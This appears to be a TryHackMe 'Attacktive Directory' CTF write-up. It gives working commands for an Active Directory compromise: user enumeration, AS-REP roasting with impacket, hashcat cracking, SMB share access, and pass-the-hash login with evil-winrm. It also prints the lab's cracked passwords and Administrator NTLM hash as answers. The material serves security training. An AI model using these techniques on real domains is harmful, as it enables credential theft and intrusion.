Attacktive Directory Room WriteUp
This is my write ups for Attacktive Directory Room on Try Hack Me.
I will not go deep into why the answer is "x" or "y", that part is your job to understand what the room is trying to teach you.
This room is also kind of CTF room so i will try go deep into technical details of the technique(s) we use.
Task 1 - Intro Deploy The Machine
- Getting started
Task 2 - Intro Setup
- Download
impacket
Task 3 - Enumeration Welcome to Attacktive Directory
What tool will allow us to enumerate port 139/445?
enum4linuxWhat is the NetBIOS-Domain Name of the machine?
THM-ADEnum4linuxenum4linux $IP
...
===========================================
| Getting domain SID for 10.10.17.164 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
...What invalid TLD do people commonly use for their Active Directory Domain?
.local
Task 4 - Enumeration Enumerating Users via Kerberos
To do this task you will first need to download kerbrute
What command within Kerbrute will allow us to enumerate valid usernames?
userenum./kerbrute --helpWhat notable account is discovered? (These should jump out at you)
svc-adminNmap Scannmap -sC -sV -T4 10.10.17.164
...
Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
...Download the modified User Lists Kerbrute userenum./kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txtWhat is the other notable account is discovered? (These should jump out at you)
backup
Task 5 - Exploitation Abusing Kerberos
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-adminUsing impacket-GetNPUsersimpacket-GetNPUsers spookysec.local/svc-admin
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:- Put the
hashwe found in a file calledhash.txtfor later usage
- Put the
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5 AS-REP etype 23- Go over here to find a matching hash for the hash we found
What mode is the hash?
18200Now crack the hash with the modified password list provided, what is the user accounts password?
management2005Download the modified Password Lists Cracking the password with hashcathashcat -m 18200 hash.txt passwordlist.txt --force
Task 6 - Enumeration Back to the Basics
What utility can we use to map remote SMB shares?
smbclientWhich option will list shares?
-LHow many remote shares is the server listing?
6SMB Enum with cred as svc-admin:management2005smbclient -L=$IP -U svc-admin
Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server shareThere is one particular share that we have access to that contains a text file. Which share is it?
backupWhat is the content of the file?
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYwDecoding the contents of the file, what is the full contents?
backup@spookysec.local:backup2517860Base64 decodeecho YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw | base64 -d
Task 7 - Domain Privilege Escalation Elevating Privileges within the Domain
What method allowed us to dump NTDS.DIT?
DRSUAPIWhat is the Administrators NTLM hash?
0e0363213e37b94221497260b0bcb4fcWhat method of attack could allow us to authenticate as the user without the password?
Pass The HashUsing a tool called Evil-WinRM what option will allow us to use a hash?
-HUsing evil-winrmevil-winrm -i 10.10.17.164 -u administrator -H 0e0363213e37b94221497260b0bcb4fc
Task 8 - Flag Submission Flag Submission Panel
svc-admin
TryHackMe{REDACTED}backup
TryHackMe{REDACTED}administrator
TryHackMe{REDACTED}